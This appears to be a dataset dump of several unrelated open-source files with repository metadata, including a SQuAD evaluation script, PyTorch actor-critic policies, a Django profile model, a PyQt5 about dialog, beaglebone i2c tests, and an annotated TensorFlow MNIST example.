Returns a tuple of (F1 score, EM score, sentence score)
The sentence score is our evaluation method for determining the
effectiveness of finding the correct sentence within the context
paragraph that may contain the answer. This metric is much softer
than the F1 or EM score as it does not consider the difficulty in
finding the span within the sentence with the answer. The SQUAD
leaderboard and evaluation scripts only consider the F1 and EM score.
"""
f1 = sscore = total = 0
for prediction, answers in zip(predictions, answerss):
total += 1
f1 += metric_max_over_ground_truths(f1_score, prediction, answers)
sscore += metric_max_over_ground_truths(sentence_score, prediction, answers)
sscore = 100.0 * sscore / total
f1 = 100.0 * f1 / total
return {'sscore':sscore, 'f1':f1}
| 32.472973 | 80 | 0.738244 | """
Functions for evaluating the performance of the model on the
squad dataset
Modified the official squad dataset evaluation script
"""
import string
import re
from collections import Counter
def normalize_answer(s):
"""Lower text and remove punctuation, articles, and extra whitespace."""
def remove_articles(text):
return re.sub(r'\b(a|an|the)\b', ' ', text)
def white_space_fix(text):
return ' '.join(text.split())
def remove_punc(text):
exclude = set(string.punctuation)
return ''.join(ch for ch in text if ch not in exclude)
def lower(text):
return text.lower()
return white_space_fix(remove_articles(remove_punc(lower(s))))
def f1_score(prediction, answer):
prediction_tokens = normalize_answer(prediction).split()
answer_tokens = normalize_answer(answer).split()
common = Counter(prediction_tokens) & Counter(answer_tokens)
num_same = sum(common.values())
if num_same == 0:
return 0
precision = 1.0 * num_same / len(prediction_tokens)
recall = 1.0 * num_same / len(answer_tokens)
f1 = (2 * precision * recall) / (precision + recall)
return f1
def sentence_score(prediction, ground_truths):
for ground_truth in ground_truths:
if ground_truth in prediction:
return 1
return 0
def metric_max_over_ground_truths(metric_fn, prediction, ground_truths):
scores_for_ground_truths = []
for ground_truth in ground_truths:
score = metric_fn(prediction, ground_truth)
scores_for_ground_truths.append(score)
return max(scores_for_ground_truths)
def evaluate(predictions, answerss):
"""
Returns a tuple of (F1 score, EM score, sentence score)
The sentence score is our evaluation method for determining the
effectiveness of finding the correct sentence within the context
paragraph that may contain the answer. This metric is much softer
than the F1 or EM score as it does not consider the difficulty in
finding the span within the sentence with the answer. The SQUAD
leaderboard and evaluation scripts only consider the F1 and EM score.
"""
f1 = sscore = total = 0
for prediction, answers in zip(predictions, answerss):
total += 1
f1 += metric_max_over_ground_truths(f1_score, prediction, answers)
sscore += metric_max_over_ground_truths(sentence_score, prediction, answers)
sscore = 100.0 * sscore / total
f1 = 100.0 * f1 / total
return {'sscore':sscore, 'f1':f1}
| 1,003 | 0 | 168 |
4515da330765b45770ff44c4563990c1d5ae63f6 | 3,834 | py | Python | src/ros_carla_rllib/policies.py | 50sven/ros_rllib | e3b38da925af6900e65b4d953d2e33a64f76faed | [
"MIT"
] | 1 | 2020-12-14T16:14:06.000Z | 2020-12-14T16:14:06.000Z | src/ros_carla_rllib/policies.py | 50sven/ros_rllib | e3b38da925af6900e65b4d953d2e33a64f76faed | [
"MIT"
] | null | null | null | src/ros_carla_rllib/policies.py | 50sven/ros_rllib | e3b38da925af6900e65b4d953d2e33a64f76faed | [
"MIT"
] | null | null | null | """Policies
This script provides policies for RL algorithms.
Class:
* Model - (arbitrary) neural network architecture
* BetaActor - actor with beta policy
* GaussianActor - actor with gaussian policy
* Critic - state value function
* ActorCritic - actor and critic combined
"""
import torch
import numpy as np
import torch.nn as nn
import torch.nn.functional as F
from torch.distributions import MultivariateNormal, Beta
| 25.731544 | 71 | 0.586594 | """Policies
This script provides policies for RL algorithms.
Class:
* Model - (arbitrary) neural network architecture
* BetaActor - actor with beta policy
* GaussianActor - actor with gaussian policy
* Critic - state value function
* ActorCritic - actor and critic combined
"""
import torch
import numpy as np
import torch.nn as nn
import torch.nn.functional as F
from torch.distributions import MultivariateNormal, Beta
class Model(nn.Module):
def __init__(self, out_size):
super(Model, self).__init__()
# Visual
self.conv1 = nn.Conv2d(3, 32, 8, 4)
self.conv2 = nn.Conv2d(32, 64, 4, 2)
self.conv3 = nn.Conv2d(64, 64, 3, 1)
self.fcV1 = nn.Linear(12288, 512)
# Numeric
self.fcN1 = nn.Linear(18, 128)
self.fcN2 = nn.Linear(128, 128)
# Combined
self.fcC1 = nn.Linear(512 + 128, 256)
# Action
self.fcOut = nn.Linear(256, out_size)
def forward(self, obs):
""" """
xV, xE, _ = obs[0], obs[1], obs[2]
# Visual
xV = F.relu(self.conv1(xV))
xV = F.relu(self.conv2(xV))
xV = F.relu(self.conv3(xV))
xV = torch.flatten(xV, 1)
xV = F.relu(self.fcV1(xV))
# Numeric
xE = F.relu(self.fcN1(xE))
xE = F.relu(self.fcN2(xE))
# Combined
xC = torch.cat([xE, xV], 1)
xC = F.relu(self.fcC1(xC))
# Output
out = self.fcOut(xC)
return out
class Actor(nn.Module):
def get_dist(self, obs):
raise NotImplementedError
def get_logp(self, pi, action):
raise NotImplementedError
def forward(self, obs, action=None):
pi = self.get_dist(obs)
logp = None
if action is not None:
logp = self.get_logp(pi, action)
return pi, logp
class BetaActor(Actor):
def __init__(self, model):
super(BetaActor, self).__init__()
self.model = globals()[model](out_size=4)
def get_dist(self, obs):
concentration = self.model(obs)
alpha = concentration[:, :2]
beta = concentration[:, 2:]
return Beta(alpha, beta)
def get_logp(self, pi, action):
return pi.log_prob(action).sum(1)
class GaussianActor(Actor):
def __init__(self, model):
super(GaussianActor, self).__init__()
self.model = globals()[model](out_size=2)
log_std = np.array([0.55, -0.35], dtype=np.float32)
self.log_std = torch.nn.Parameter(torch.as_tensor(log_std))
def get_dist(self, obs):
mu = self.model(obs)
std = torch.exp(self.log_std)
return MultivariateNormal(mu, scale_tril=torch.diag_embed(std))
def get_logp(self, pi, action):
return pi.log_prob(action)
class Critic(nn.Module):
def __init__(self, model):
super(Critic, self).__init__()
self.model = globals()[model](out_size=1)
def forward(self, obs):
""" """
return self.model(obs)
class ActorCritic(object):
def __init__(self, model, policy="gaussian", device="cpu"):
policy = policy.capitalize() + "Actor"
self.pi = globals()[policy](model).to(device)
self.value_fn = Critic(model).to(device)
def act(self, obs):
"""Returns (deterministic) action and state value"""
with torch.no_grad():
pi = self.pi.get_dist(obs)
value = self.value_fn(obs)
return pi.mean.numpy(), value.item()
def sample(self, obs):
"""Returns sampled action, log probability and state-value"""
with torch.no_grad():
pi = self.pi.get_dist(obs)
sample = pi.sample()
logp = self.pi.get_logp(pi, sample)
value = self.value_fn(obs)
return sample.numpy(), logp.item(), value.item()
| 1,716 | 1,289 | 381 |
4936791bab78f4771ebc17ca5ede24c3e7259a3a | 2,416 | py | Python | profiles/models.py | Vlad-404/phot-portfolio | ff3fba512645c0781755bf5b6f7cc455f09b3c5b | [
"BSD-Source-Code"
] | 1 | 2021-01-05T15:52:19.000Z | 2021-01-05T15:52:19.000Z | profiles/models.py | Vlad-404/phot-portfolio | ff3fba512645c0781755bf5b6f7cc455f09b3c5b | [
"BSD-Source-Code"
] | null | null | null | profiles/models.py | Vlad-404/phot-portfolio | ff3fba512645c0781755bf5b6f7cc455f09b3c5b | [
"BSD-Source-Code"
] | 1 | 2021-01-05T18:44:47.000Z | 2021-01-05T18:44:47.000Z | from django.db import models
from django.contrib.auth.models import User
from django_countries.fields import CountryField
# Imports so it can receive data from signals.py
from django.db.models.signals import post_save
from django.dispatch import receiver
# Create or update user profile
@receiver(post_save, sender=User)
| 36.606061 | 71 | 0.440397 | from django.db import models
from django.contrib.auth.models import User
from django_countries.fields import CountryField
# Imports so it can receive data from signals.py
from django.db.models.signals import post_save
from django.dispatch import receiver
class UserProfile(models.Model):
# Specifies that each user can have only one profile
user = models.OneToOneField(
User,
on_delete=models.CASCADE)
# Adds values for storing
default_phone_number = models.CharField(
max_length=20,
null=True,
blank=True,
)
default_street_address1 = models.CharField(
max_length=80,
null=True,
blank=True
)
default_street_address2 = models.CharField(
max_length=80,
null=True,
blank=True
)
default_county = models.CharField(
max_length=80,
null=True,
blank=True
)
default_town_or_city = models.CharField(
max_length=40,
null=True,
blank=True
)
default_postcode = models.CharField(
max_length=20,
null=True,
blank=True,
default=''
)
default_country = CountryField(
blank_label='Country',
max_length=20,
null=True,
blank=True
)
def __str__(self):
return self.user.username
# Create or update user profile
@receiver(post_save, sender=User)
def create_or_update_user_profile(sender, instance, created, **kwargs):
if created:
UserProfile.objects.create(user=instance)
# For existing users, just saves the profile
instance.userprofile.save()
| 229 | 1,817 | 45 |
446332503930a9c0debdf3c989c347e8eee3151c | 11,368 | py | Python | qrvt_dialog_about.py | KrOstir/rvt-qgis | 43b23fd863e222a48767ae2e2a0d16708c4cf1c7 | [
"Apache-2.0"
] | 6 | 2021-02-02T12:47:45.000Z | 2022-02-14T10:31:36.000Z | qrvt_dialog_about.py | KrOstir/rvt-qgis | 43b23fd863e222a48767ae2e2a0d16708c4cf1c7 | [
"Apache-2.0"
] | 12 | 2020-12-14T06:45:14.000Z | 2021-08-10T05:25:10.000Z | qrvt_dialog_about.py | KrOstir/rvt-qgis | 43b23fd863e222a48767ae2e2a0d16708c4cf1c7 | [
"Apache-2.0"
] | 2 | 2021-01-23T00:11:12.000Z | 2021-12-14T22:53:13.000Z | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'qrvt_dialog_about.ui'
#
# Created by: PyQt5 UI code generator 5.15.1
#
# WARNING: Any manual changes made to this file will be lost when pyuic5 is
# run again. Do not edit this file unless you know what you are doing.
from PyQt5 import QtCore, QtGui, QtWidgets
| 55.453659 | 225 | 0.674085 | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'qrvt_dialog_about.ui'
#
# Created by: PyQt5 UI code generator 5.15.1
#
# WARNING: Any manual changes made to this file will be lost when pyuic5 is
# run again. Do not edit this file unless you know what you are doing.
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_RvtAbout(object):
def setupUi(self, RvtAbout):
RvtAbout.setObjectName("RvtAbout")
RvtAbout.resize(600, 700)
self.verticalLayout_3 = QtWidgets.QVBoxLayout(RvtAbout)
self.verticalLayout_3.setObjectName("verticalLayout_3")
self.verticalLayout = QtWidgets.QVBoxLayout()
self.verticalLayout.setSizeConstraint(QtWidgets.QLayout.SetMinAndMaxSize)
self.verticalLayout.setObjectName("verticalLayout")
self.label = QtWidgets.QLabel(RvtAbout)
self.label.setMinimumSize(QtCore.QSize(0, 0))
self.label.setMaximumSize(QtCore.QSize(16777215, 16777215))
font = QtGui.QFont()
font.setPointSize(10)
font.setBold(True)
font.setWeight(75)
self.label.setFont(font)
self.label.setObjectName("label")
self.verticalLayout.addWidget(self.label)
self.horizontalLayout = QtWidgets.QHBoxLayout()
self.horizontalLayout.setObjectName("horizontalLayout")
self.label_2 = QtWidgets.QLabel(RvtAbout)
self.label_2.setMinimumSize(QtCore.QSize(0, 0))
self.label_2.setMaximumSize(QtCore.QSize(16777215, 16777215))
self.label_2.setObjectName("label_2")
self.horizontalLayout.addWidget(self.label_2)
self.horizontalLayout_2 = QtWidgets.QHBoxLayout()
self.horizontalLayout_2.setObjectName("horizontalLayout_2")
spacerItem = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_2.addItem(spacerItem)
self.verticalLayout_2 = QtWidgets.QVBoxLayout()
self.verticalLayout_2.setObjectName("verticalLayout_2")
self.label_9 = QtWidgets.QLabel(RvtAbout)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_9.sizePolicy().hasHeightForWidth())
self.label_9.setSizePolicy(sizePolicy)
self.label_9.setMinimumSize(QtCore.QSize(240, 147))
self.label_9.setMaximumSize(QtCore.QSize(240, 147))
self.label_9.setText("")
self.label_9.setPixmap(QtGui.QPixmap("icon.png"))
self.label_9.setScaledContents(True)
self.label_9.setObjectName("label_9")
self.verticalLayout_2.addWidget(self.label_9)
self.horizontalLayout_2.addLayout(self.verticalLayout_2)
spacerItem1 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_2.addItem(spacerItem1)
self.horizontalLayout.addLayout(self.horizontalLayout_2)
self.verticalLayout.addLayout(self.horizontalLayout)
self.label_3 = QtWidgets.QLabel(RvtAbout)
self.label_3.setMinimumSize(QtCore.QSize(0, 0))
self.label_3.setMaximumSize(QtCore.QSize(16777215, 16777215))
self.label_3.setOpenExternalLinks(True)
self.label_3.setObjectName("label_3")
self.verticalLayout.addWidget(self.label_3)
self.label_4 = QtWidgets.QLabel(RvtAbout)
self.label_4.setMinimumSize(QtCore.QSize(0, 0))
self.label_4.setMaximumSize(QtCore.QSize(16777215, 16777215))
self.label_4.setObjectName("label_4")
self.verticalLayout.addWidget(self.label_4)
self.label_5 = QtWidgets.QLabel(RvtAbout)
self.label_5.setMinimumSize(QtCore.QSize(0, 0))
self.label_5.setMaximumSize(QtCore.QSize(16777215, 16777215))
self.label_5.setObjectName("label_5")
self.verticalLayout.addWidget(self.label_5)
self.label_7 = QtWidgets.QLabel(RvtAbout)
self.label_7.setObjectName("label_7")
self.verticalLayout.addWidget(self.label_7)
self.label_8 = QtWidgets.QLabel(RvtAbout)
self.label_8.setOpenExternalLinks(True)
self.label_8.setObjectName("label_8")
self.verticalLayout.addWidget(self.label_8)
self.label_6 = QtWidgets.QLabel(RvtAbout)
self.label_6.setObjectName("label_6")
self.verticalLayout.addWidget(self.label_6)
self.horizontalLayout_3 = QtWidgets.QHBoxLayout()
self.horizontalLayout_3.setObjectName("horizontalLayout_3")
spacerItem2 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_3.addItem(spacerItem2)
self.button_report_bug = QtWidgets.QPushButton(RvtAbout)
self.button_report_bug.setObjectName("button_report_bug")
self.horizontalLayout_3.addWidget(self.button_report_bug)
spacerItem3 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_3.addItem(spacerItem3)
self.button_close = QtWidgets.QPushButton(RvtAbout)
self.button_close.setObjectName("button_close")
self.horizontalLayout_3.addWidget(self.button_close)
spacerItem4 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_3.addItem(spacerItem4)
self.horizontalLayout_3.setStretch(0, 1)
self.horizontalLayout_3.setStretch(1, 1)
self.horizontalLayout_3.setStretch(2, 5)
self.horizontalLayout_3.setStretch(3, 1)
self.horizontalLayout_3.setStretch(4, 1)
self.verticalLayout.addLayout(self.horizontalLayout_3)
self.verticalLayout_3.addLayout(self.verticalLayout)
self.retranslateUi(RvtAbout)
QtCore.QMetaObject.connectSlotsByName(RvtAbout)
def retranslateUi(self, RvtAbout):
_translate = QtCore.QCoreApplication.translate
RvtAbout.setWindowTitle(_translate("RvtAbout", "RvtAbout"))
self.label.setText(_translate("RvtAbout", "Relief Visualization Toolbox (RVT) QGIS plugin, ver. 0.3"))
self.label_2.setText(_translate("RvtAbout", "<html><head/><body>\n"
"<span style=\" font-weight:600;\">○ By:</span>\n"
"\n"
"<br>​ ​ ​ ​ \n"
"• Žiga Kokalj\n"
"\n"
"<br>​ ​ ​ ​ \n"
"• Krištof Oštir\n"
"\n"
"<br>​ ​ ​ ​ \n"
"• Klemen Zakšek\n"
"\n"
"<br>​ ​ ​ ​ \n"
"• Peter Pehani\n"
"\n"
"<br>​ ​ ​ ​ \n"
"• Klemen Čotar\n"
"\n"
"<br>​ ​ ​ ​ \n"
"• Maja Somrak\n"
"\n"
"<br>​ ​ ​ ​ \n"
"• Žiga Maroh (plugin author and maintainer)\n"
"<br>\n"
"<\\body>\n"
"<\\html>"))
self.label_3.setText(_translate("RvtAbout", "<html><head/><body>\n"
"<span style=\" font-weight:600;\">○ Online resources:</span><br>\n"
"\n"
"​ ​ ​ ​ • <a href=\"https://github.com/EarthObservation/rvt-qgis\"><span style=\" text-decoration: none; color:#0000ff;\">RVT QGIS plugin GitHub</span></a><br>\n"
"\n"
"​ ​ ​ ​ • <a href=\"https://github.com/EarthObservation/RVT_py\"><span style=\" text-decoration: none; color:#0000ff;\">RVT core python library GitHub</span></a><br>\n"
"\n"
"​ ​ ​ ​ • <a href=\"https://github.com/EarthObservation/rvt-arcgis-pro\"><span style=\" text-decoration: none; color:#0000ff;\">RVT ArcGIS Pro raster functions GitHub</span></a><br>\n"
"\n"
"​ ​ ​ ​ • <a href=\"https://iaps.zrc-sazu.si/en/rvt#v\"><span style=\" text-decoration: none; color:#0000ff;\">Old RVT</span></a><br>\n"
"\n"
"<\\body>\n"
"<\\html>"))
self.label_4.setText(_translate("RvtAbout", "<html><head/><body>\n"
"<span style=\" font-weight:600;\">○ License agreement:</span> <br>\n"
"​ ​ ​ ​ This software is distributed without any warranty and without even the implied warranty of merchantability or fitness \n"
"<br>​ ​ ​ ​ \n"
" for a particulat pupose.\n"
"<br>\n"
"<\\body>\n"
"<\\html>"))
self.label_5.setText(_translate("RvtAbout", "<html><head/><body><p><span style=\" font-weight:600;\">○ Acknowledgment:</span><br/>\n"
"​ ​ ​ ​ \n"
"Development of RVT was partly financed by the European Commission\'s Culture Programme through \n"
"<br/>​ ​ ​ ​ \n"
"the ArchaeoLandscapes Europe project and by the Slovenian Research Agency core funding No. P2-0406,\n"
"<br/>​ ​ ​ ​ \n"
" and by research projects No. J6-7085 and No. J6-9395. <br/></p></body></html>"))
self.label_7.setText(_translate("RvtAbout", "<html><head/><body><p><span style=\" font-weight:600;\">○ Refrences:</span><br/>\n"
"​ ​ ​ ​ \n"
"When using tools, please cite: <br>​ ​ ​ ​ \n"
"• Kokalj, Ž., Somrak, M. 2019. Why Not a Single Image? Combining Visualizations to Facilitate Fieldwork and\n"
"<br>​ ​ ​ ​ ​ ​ ​ \n"
" On-Screen Mapping. Remote Sensing 11(7): 747.\n"
"<br>​ ​ ​ ​ \n"
"• Zakšek, K., Oštir, K., Kokalj, Ž. 2011. Sky-View Factor as a Relief Visualization Technique.\n"
"<br>​ ​ ​ ​ ​ ​ ​ \n"
" Remote Sensing 3: 398-415.\n"
"<br>​ ​ ​ ​ \n"
"• Kokalj, Ž., Zakšek, K., Oštir, K. 2011. Application of Sky-View Factor for the Visualization of Historic Landscape \n"
"<br>​ ​ ​ ​ ​ ​ ​ \n"
"Features in Lidar-Derived Relief Models. Antiquity 85, 327: 263-273.\n"
"<br>\n"
"</body></html>"))
self.label_8.setText(_translate("RvtAbout", "<html><head/><body><p><span style=\" font-weight:600;\">○ Bugs and Suggestions:</span><br/>\n"
"​ ​ ​ ​ \n"
"Please report any bugs to <a href=\"https://github.com/EarthObservation/rvt-qgis/issues\"><span style=\" text-decoration: none; color:#0000ff;\">Issues</span></a> or to email: ziga.maroh@icloud.com\n"
"<br>\n"
"​ ​ ​ ​ \n"
"Suggestions for improvments can be sent to email: ziga.kokalj@zrc-sazu.si\n"
"<br>\n"
"</body></html>"))
self.label_6.setText(_translate("RvtAbout", "<html><head/><body><p><span style=\" font-weight:600;\">○ © Copyright:</span><br/>\n"
"​ ​ ​ ​ \n"
"Research Center of the Slovenian Academy of Sciences and Arts (ZRC SAZU) and <br>​ ​ ​ ​ \n"
" University of Ljubljana, Faculty of Civil and Geodetic Engineering (UL FGG), 2020\n"
"<br>\n"
"</body></html>"))
self.button_report_bug.setText(_translate("RvtAbout", "Report a bug"))
self.button_close.setText(_translate("RvtAbout", "Close"))
| 10,999 | 5 | 76 |
7cf6302011a542d687e42d92503a0c389d9e374c | 3,109 | py | Python | servo/interface/bbi2c_unittests.py | neverware-mirrors/hdctools | dd7f911bb9051e615af7fcb71d921bd481f934fb | [
"BSD-3-Clause"
] | null | null | null | servo/interface/bbi2c_unittests.py | neverware-mirrors/hdctools | dd7f911bb9051e615af7fcb71d921bd481f934fb | [
"BSD-3-Clause"
] | null | null | null | servo/interface/bbi2c_unittests.py | neverware-mirrors/hdctools | dd7f911bb9051e615af7fcb71d921bd481f934fb | [
"BSD-3-Clause"
] | null | null | null | # Copyright (c) 2013 The Chromium OS Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Tests usage of i2c interface for beaglebone devices."""
import mox
import unittest
import bbi2c
DEFAULT_BUS_NUM = 3
SLAVE_ADDRESS = 0x20
DATA_ADDRESS = 0x0
if __name__ == '__main__':
unittest.main()
| 31.40404 | 76 | 0.677388 | # Copyright (c) 2013 The Chromium OS Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Tests usage of i2c interface for beaglebone devices."""
import mox
import unittest
import bbi2c
DEFAULT_BUS_NUM = 3
SLAVE_ADDRESS = 0x20
DATA_ADDRESS = 0x0
class TestBBi2c(mox.MoxTestBase):
def setUp(self):
super(TestBBi2c, self).setUp()
bbi2c.subprocess = self.mox.CreateMockAnything()
bbi2c.bbmux_controller = self.mox.CreateMockAnything()
bbi2c.bbmux_controller.use_omapmux().AndReturn(True)
def readTestHelper(self, data, send_address=True):
if send_address:
self.singleWriteTestHelper([DATA_ADDRESS])
args = ['i2cget', '-y', '3', '0x20']
if len(data) == 2:
args.append('0x%02x' % DATA_ADDRESS)
args.append('w')
result = '0x' + ''.join('%02x' % byte for byte in reversed(data))
bbi2c.subprocess.check_output(args).AndReturn(result)
def singleWriteTestHelper(self, data):
args = ['i2cset', '-y', '3', '0x20', '0x%02x' % data[0]]
if data[1:]:
reversed_data = reversed(data[1:])
args.append('0x' + ''.join('%02x' % wbyte for wbyte in reversed_data))
if len(data[1:]) == 2:
args.append('w')
bbi2c.subprocess.check_call(args)
def testSingleByteRead(self):
data = [0x10]
self.readTestHelper(data)
self.mox.ReplayAll()
self.bbi2c = bbi2c.BBi2c({'bus_num': 2})
result = self.bbi2c.wr_rd(SLAVE_ADDRESS, [DATA_ADDRESS], len(data))
self.assertEquals(result, data)
def testMultiByteRead(self):
data = [0x10, 0x01]
self.readTestHelper(data)
self.mox.ReplayAll()
self.bbi2c = bbi2c.BBi2c({'bus_num': 2})
result = self.bbi2c.wr_rd(SLAVE_ADDRESS, [DATA_ADDRESS], len(data))
self.assertEquals(result, data)
def testSingleByteWrite(self):
data = [0x7]
self.singleWriteTestHelper(data)
self.mox.ReplayAll()
self.bbi2c = bbi2c.BBi2c({'bus_num': 2})
self.bbi2c.wr_rd(SLAVE_ADDRESS, data, 0)
def testTwoByteWrite(self):
data = [0x7, 0x8]
self.singleWriteTestHelper(data)
self.mox.ReplayAll()
self.bbi2c = bbi2c.BBi2c({'bus_num': 2})
self.bbi2c.wr_rd(SLAVE_ADDRESS, data, 0)
def testThreeByteWrite(self):
data = [0x7, 0x8, 0x9]
self.singleWriteTestHelper(data)
self.mox.ReplayAll()
self.bbi2c = bbi2c.BBi2c({'bus_num': 2})
self.bbi2c.wr_rd(SLAVE_ADDRESS, data, 0)
def testBlockWriteFailure(self):
data = [0x7, 0x8, 0x9, 0x10, 0x11, 0x12, 0x13]
self.mox.ReplayAll()
self.bbi2c = bbi2c.BBi2c({'bus_num': 2})
with self.assertRaises(bbi2c.BBi2cError):
self.bbi2c.wr_rd(SLAVE_ADDRESS, data, 0)
def testWriteAndRead(self):
wr_data = [DATA_ADDRESS, 0x8, 0x9]
rd_data = [0x10, 0x01]
self.singleWriteTestHelper(wr_data)
self.readTestHelper(rd_data, send_address=False)
self.mox.ReplayAll()
self.bbi2c = bbi2c.BBi2c({'bus_num': 2})
result = self.bbi2c.wr_rd(SLAVE_ADDRESS, wr_data, len(rd_data))
self.assertEquals(result, rd_data)
if __name__ == '__main__':
unittest.main()
| 2,446 | 12 | 273 |
07db565e89e01b930eca278def9e68e73aa86ff3 | 10,919 | py | Python | tools/nni_annotation/examples/mnist_with_annotation.py | lawwu/nni | b869dd48dfe36392e7b78c70ea35eb6d4b4779dc | [
"MIT"
] | 2 | 2020-02-03T09:00:47.000Z | 2020-02-03T09:00:49.000Z | tools/nni_annotation/examples/mnist_with_annotation.py | leckie-chn/nni | 141f24d42d2e86ace3774d931bfab58dca0ef1ad | [
"MIT"
] | 16 | 2020-01-28T22:44:42.000Z | 2022-02-10T00:20:32.000Z | tools/nni_annotation/examples/mnist_with_annotation.py | leckie-chn/nni | 141f24d42d2e86ace3774d931bfab58dca0ef1ad | [
"MIT"
] | 1 | 2019-11-29T08:56:14.000Z | 2019-11-29T08:56:14.000Z | #!/usr/bin/python
# Copyright (c) Microsoft Corporation
# All rights reserved.
#
# MIT License
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
# documentation files (the "Software"), to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and
# to permit persons to whom the Software is furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING
# BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
# DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""A deep MNIST classifier using convolutional layers."""
import logging
import math
import tempfile
import time
import tensorflow as tf
from tensorflow.examples.tutorials.mnist import input_data
FLAGS = None
logger = logging.getLogger('mnist_AutoML')
class MnistNetwork(object):
'''
MnistNetwork is for initlizing and building basic network for mnist.
'''
def build_network(self):
'''
Building network for mnist
'''
# Reshape to use within a convolutional neural net.
# Last dimension is for "features" - there is only one here, since images are
# grayscale -- it would be 3 for an RGB image, 4 for RGBA, etc.
with tf.name_scope('reshape'):
try:
input_dim = int(math.sqrt(self.x_dim))
except:
print(
'input dim cannot be sqrt and reshape. input dim: ' + str(self.x_dim))
logger.debug(
'input dim cannot be sqrt and reshape. input dim: %s', str(self.x_dim))
raise
x_image = tf.reshape(self.images, [-1, input_dim, input_dim, 1])
# First convolutional layer - maps one grayscale image to 32 feature maps.
with tf.name_scope('conv1'):
w_conv1 = weight_variable(
[self.conv_size, self.conv_size, 1, self.channel_1_num])
b_conv1 = bias_variable([self.channel_1_num])
"""@nni.function_choice(tf.nn.relu(conv2d(x_image, w_conv1) + b_conv1), tf.nn.sigmoid(conv2d(x_image, w_conv1) + b_conv1), tf.nn.tanh(conv2d(x_image, w_conv1) + b_conv1), name=tf.nn.relu)"""
h_conv1 = tf.nn.relu(conv2d(x_image, w_conv1) + b_conv1)
# Pooling layer - downsamples by 2X.
with tf.name_scope('pool1'):
"""@nni.function_choice(max_pool(h_conv1, self.pool_size), avg_pool(h_conv1, self.pool_size), name=max_pool)"""
h_pool1 = max_pool(h_conv1, self.pool_size)
# Second convolutional layer -- maps 32 feature maps to 64.
with tf.name_scope('conv2'):
w_conv2 = weight_variable([self.conv_size, self.conv_size,
self.channel_1_num, self.channel_2_num])
b_conv2 = bias_variable([self.channel_2_num])
h_conv2 = tf.nn.relu(conv2d(h_pool1, w_conv2) + b_conv2)
# Second pooling layer.
with tf.name_scope('pool2'):
h_pool2 = max_pool(h_conv2, self.pool_size)
# Fully connected layer 1 -- after 2 round of downsampling, our 28x28 image
# is down to 7x7x64 feature maps -- maps this to 1024 features.
last_dim = int(input_dim / (self.pool_size * self.pool_size))
with tf.name_scope('fc1'):
w_fc1 = weight_variable(
[last_dim * last_dim * self.channel_2_num, self.hidden_size])
b_fc1 = bias_variable([self.hidden_size])
h_pool2_flat = tf.reshape(
h_pool2, [-1, last_dim * last_dim * self.channel_2_num])
h_fc1 = tf.nn.relu(tf.matmul(h_pool2_flat, w_fc1) + b_fc1)
# Dropout - controls the complexity of the model, prevents co-adaptation of features.
with tf.name_scope('dropout'):
h_fc1_drop = tf.nn.dropout(h_fc1, self.keep_prob)
# Map the 1024 features to 10 classes, one for each digit
with tf.name_scope('fc2'):
w_fc2 = weight_variable([self.hidden_size, self.y_dim])
b_fc2 = bias_variable([self.y_dim])
y_conv = tf.matmul(h_fc1_drop, w_fc2) + b_fc2
with tf.name_scope('loss'):
cross_entropy = tf.reduce_mean(
tf.nn.softmax_cross_entropy_with_logits(labels=self.labels, logits=y_conv))
with tf.name_scope('adam_optimizer'):
self.train_step = tf.train.AdamOptimizer(
self.learning_rate).minimize(cross_entropy)
with tf.name_scope('accuracy'):
correct_prediction = tf.equal(
tf.argmax(y_conv, 1), tf.argmax(self.labels, 1))
self.accuracy = tf.reduce_mean(
tf.cast(correct_prediction, tf.float32))
def conv2d(x_input, w_matrix):
"""conv2d returns a 2d convolution layer with full stride."""
return tf.nn.conv2d(x_input, w_matrix, strides=[1, 1, 1, 1], padding='SAME')
def max_pool(x_input, pool_size):
"""max_pool downsamples a feature map by 2X."""
return tf.nn.max_pool(x_input, ksize=[1, pool_size, pool_size, 1],
strides=[1, pool_size, pool_size, 1], padding='SAME')
def weight_variable(shape):
"""weight_variable generates a weight variable of a given shape."""
initial = tf.truncated_normal(shape, stddev=0.1)
return tf.Variable(initial)
def bias_variable(shape):
"""bias_variable generates a bias variable of a given shape."""
initial = tf.constant(0.1, shape=shape)
return tf.Variable(initial)
def download_mnist_retry(data_dir, max_num_retries=20):
"""Try to download mnist dataset and avoid errors"""
for _ in range(max_num_retries):
try:
return input_data.read_data_sets(data_dir, one_hot=True)
except tf.errors.AlreadyExistsError:
time.sleep(1)
